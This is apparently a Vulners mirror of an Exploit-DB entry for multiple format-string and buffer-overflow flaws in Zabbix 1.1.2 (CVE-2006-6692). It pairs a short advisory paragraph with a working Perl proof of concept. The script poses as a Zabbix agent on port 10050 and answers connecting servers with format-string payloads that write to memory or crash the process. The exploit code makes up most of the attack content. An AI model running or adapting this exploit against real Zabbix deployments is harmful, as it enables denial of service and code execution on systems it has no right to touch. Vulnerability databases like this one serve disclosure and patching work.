Lucene search
+L

Zabbix 1.1.2 - Multiple Remote Code Execution Vulnerabilities

🗓️ 09 Oct 2006 00:00:00Reported by Max VozelerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

ZABBIX 1.1.2 - Remote Code Execution Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
ZABBIX Multiple Overflows
10 Oct 200600:00
nessus
CVE
CVE-2006-6692
21 Dec 200621:00
cve
Cvelist
CVE-2006-6692
21 Dec 200621:00
cvelist
Debian CVE
CVE-2006-6692
21 Dec 200621:00
debiancve
EUVD
EUVD-2006-6675
7 Oct 202500:30
euvd
NVD
CVE-2006-6692
21 Dec 200621:28
nvd
OSV
DEBIAN-CVE-2006-6692
21 Dec 200621:28
osv
UbuntuCve
CVE-2006-6692
21 Dec 200621:28
ubuntucve
source: https://www.securityfocus.com/bid/20416/info

ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities.

Reports indicate that these issues facilitate format-string and buffer-overflow attacks. A remote attacker may leverage these vulnerabilities to trigger denial-of-service conditions or to execute arbitrary code to gain unauthorized access to a vulnerable computer. This would occur in the context of the application.

ZABBIX version 1.1.2 is reported vulnerable; other versions may be affected as well.

#!/usr/bin/perl --

# zabbix-exploiter
# by Ulf Harnhammar in 2006
# I hereby place this program in the public domain.

use IO::Socket;
$server = IO::Socket::INET->new( Proto     => 'tcp',
                                 LocalPort => 10050,
                                 Listen    => SOMAXCONN,
                                 Reuse     => 1);
die "can't create server\n" if !$server;

while ($client = $server->accept())
{
  $client->autoflush(1);
  $key = <$client>; print $key;
  print $client 'UUUU%16$n'; # writes data to 0x55555555, at least on Debian testing
  # print $client '%n%n%n%n'; # crashes
  close $client;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Feb 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.07848
29